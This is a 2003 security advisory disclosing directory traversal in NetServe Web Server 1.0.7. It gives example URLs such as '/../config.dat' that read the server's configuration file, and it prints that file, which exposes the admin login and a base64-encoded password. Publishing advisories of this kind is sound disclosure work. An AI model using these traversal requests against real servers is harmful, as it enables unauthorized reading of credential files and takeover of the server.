<<< Date Index >>>     <<< Thread Index >>>

Multiple vulnerability in NetServe 1.0.7



  ________________________
/                                                         
|  For Contacts:                                 
|  nimber                                             
| e-mail: nimber@xxxxxxx                  
|         nimber@xxxxxxxxxxx          
|Home Page: www.nimber.plux.ru  
|ICQ: 132614                                      
\________________________ 

Advisory Information: 
=================                                      
Application : NetServe  Web Server                      
Date        : 17.11.2003                                
Vendor Homepage : http://www.starlots.com/netx/index.html            
Versions : 1.0.7 (maybe older)                         
Platforms: Windows NT, 95, 98, 2000, and XP.                         
Severity : High   
Local : yes                                                  
Remote: yes      
Tested on WinXP and Win2K.

=================
Advisories: Multiple vulnerability in NetServe 1.0.7
=================
The description of a product (from the developer): 
"About NetServe Web Server
NetServe is a super compact Web Server and File Sharing application for Windows 
NT, 95, 98, 2000, and XP.
It's HTTP Web Server can serve all types of files including html, gif and jpeg, 
actually any files placed in your NetServe directory can be served.
New key features include Server-Side-Include (SSI) support and CGI/1.1 support 
giving you the choice of your preferred scripting language, 
including but not limited to; Perl, ASP and PHP, to create your dynamic 
content. Other features include a fully integrated File Sharing application 
supplying a html front end to allow for directory browsing and download. A html 
form gives users the ability to upload up-to 5 files simultaneously to any 
directory.
With security in mind, NetServe features admin tools that allow you full 
control of how users accessing your server see the resources available, just 
some of the 
options include, Access served pages only, allow directory browsing, allow file 
downloading, and even allow file uploading.
And of course every action being performed on the NetServe Server is 
automatically logged, so you can interrogate the logs at a later date for 
statistics."
=================
The contents:
=================
+ Advisory Information.
+ Part 1: Directory traversal vulnerability. 
+ Part 2: Viewing of a configuration servers.
+ Part 3: Access to the admin password. 
=================
Part - 1:
======
Servers does not filter " /../../ ", that allows to rise on a folder above.
The found vulnerability allows to look through contents of folders and files. 
Example: http://[victim]/../test/
Allows to see contents of a folder - /test/
Example: http://[victim]/../test/test.txt
Allows to see contents of a file test.txt which is in a folder /test/

Part- 2:
======
By default in adjustments servers the folder of a site is in [NetServe Web 
Server folder]\wwwroot\
If the admin did not change this adjustment, using the found vulnerability we 
can receive access to a file of a configuration servers. 
Example:
http://[victim]/../config.dat

Example of a file:
================
EnableCGI True
EnableRemoteAdmin True
EnableSSI False
EnablePasswords True
IndexFiles index.html index.htm
SSIAbbrevSize True
SSIExtensions shtml
SSIErrorMessage An SSI Error Has Occured
SSITimeFormat 
AuthenticationType Basic
Port 80
ServerRoot D:\Program Files\NetServe Web Server\wwwroot\
Logging True
Counter False
Minimized True
ActivateOnStart False
MimeTypes application/mac-binhex40|hqx
MimeTypes application/msword|doc
MimeTypes application/octet-stream|bin dms lha lzh exe class
MimeTypes application/pdf|pdf
MimeTypes application/postscript|ai eps ps
MimeTypes application/smil|smi smil
MimeTypes application/vnd.mif|mif
MimeTypes application/vnd.ms-asf|asf
MimeTypes application/vnd.ms-excel|xls
MimeTypes application/vnd.ms-powerpoint|ppt
MimeTypes application/x-cdlink|vcd
MimeTypes application/x-compress|Z
MimeTypes application/x-cpio|cpio
MimeTypes application/x-csh|csh
MimeTypes application/x-director|dcr dir dxr
MimeTypes application/x-dvi|dvi
MimeTypes application/x-gtar|gtar
MimeTypes application/x-gzip|gz
MimeTypes application/x-javascript|js
MimeTypes application/x-latex|latex
MimeTypes application/x-sh|sh
MimeTypes application/x-shar|shar
MimeTypes application/x-shockwave-flash|swf
MimeTypes application/x-stuffit|sit
MimeTypes application/x-tar|tar
MimeTypes application/x-tcl|tcl
MimeTypes application/x-tex|tex
MimeTypes application/x-texinfo|texinfo texi
MimeTypes application/x-troff|t tr roff
MimeTypes application/x-troff-man|man
MimeTypes application/x-troff-me|me
MimeTypes application/x-troff-ms|ms
MimeTypes application/zip|zip
MimeTypes audio/basic|au snd
MimeTypes audio/midi|mid midi kar
MimeTypes audio/mpeg|mpga mp2 mp3
MimeTypes audio/x-aiff|aif aiff aifc
MimeTypes audio/x-pn-realaudio|ram rm
MimeTypes audio/x-realaudio|ra
MimeTypes audio/x-wav|wav
MimeTypes image/bmp|bmp
MimeTypes image/gif|gif
MimeTypes image/ief|ief
MimeTypes image/jpeg|jpeg jpg jpe
MimeTypes image/png|png
MimeTypes image/tiff|tiff tif
MimeTypes image/x-cmu-raster|ras
MimeTypes image/x-portable-anymap|pnm
MimeTypes image/x-portable-bitmap|pbm
MimeTypes image/x-portable-graymap|pgm
MimeTypes image/x-portable-pixmap|ppm
MimeTypes image/x-rgb|rgb
MimeTypes image/x-xbitmap|xbm
MimeTypes image/x-xpixmap|xpm
MimeTypes image/x-xwindowdump|xwd
MimeTypes image/x-icon|ico
MimeTypes model/iges|igs iges
MimeTypes model/mesh|msh mesh silo
MimeTypes model/vrml|wrl vrml
MimeTypes text/css|css
MimeTypes text/html|html htm
MimeTypes text/plain|asc txt
MimeTypes text/richtext|rtx
MimeTypes text/rtf|rtf
MimeTypes text/sgml|sgml sgm
MimeTypes text/tab-separated-values|tsv
MimeTypes text/xml|xml
MimeTypes video/mpeg|mpeg mpg mpe
MimeTypes video/quicktime|qt mov
MimeTypes video/x-msvideo|avi
Users nimber|password||bmltYmWyfnZpFXmuYW0=
Aliases /admin|D:\Program Files\NetServe Web Server\admin
================

Peart-3:
======
Using the above described vulnerability, we can receive the password of the 
admin for the remote administration servers. It will allow us completely to 
change a configuration servers! 
The password and login we can see in a file of a configuration, about which 
there was a 
speech above, config.dat. If you pay attention to last lines, it is possible to 
see the information, 
necessary to us:
====[config.dat]====
Users nimber|vietnam||bmltYmVyOnZpZXRuYW0=
Aliases /admin|D:\Program Files\NetServe Web Server\admin
====[config.dat]====

As we see a folder, in which is scripts of the admin.
I want to pay yours of attention, that the password and login are not protected!

=================
For Contacts:
nimber
e-mail: nimber@xxxxxxx
            nimber@xxxxxxxxxxx
Home Page: www.nimber.plux.ru
ICQ: 132614
=================
Gr33tz: ZeT, XSPYD3X, euronymous,  JLx, Iww, unix, Demon, mestereeo, Pirog, 
Corpse, x-a13x, insurrectionist, UnInstall, Kabuto and all my friends.
Re: krok, 3APA3A, buggzy.

             p.s> SORRY for my bad english ;)
_EOF_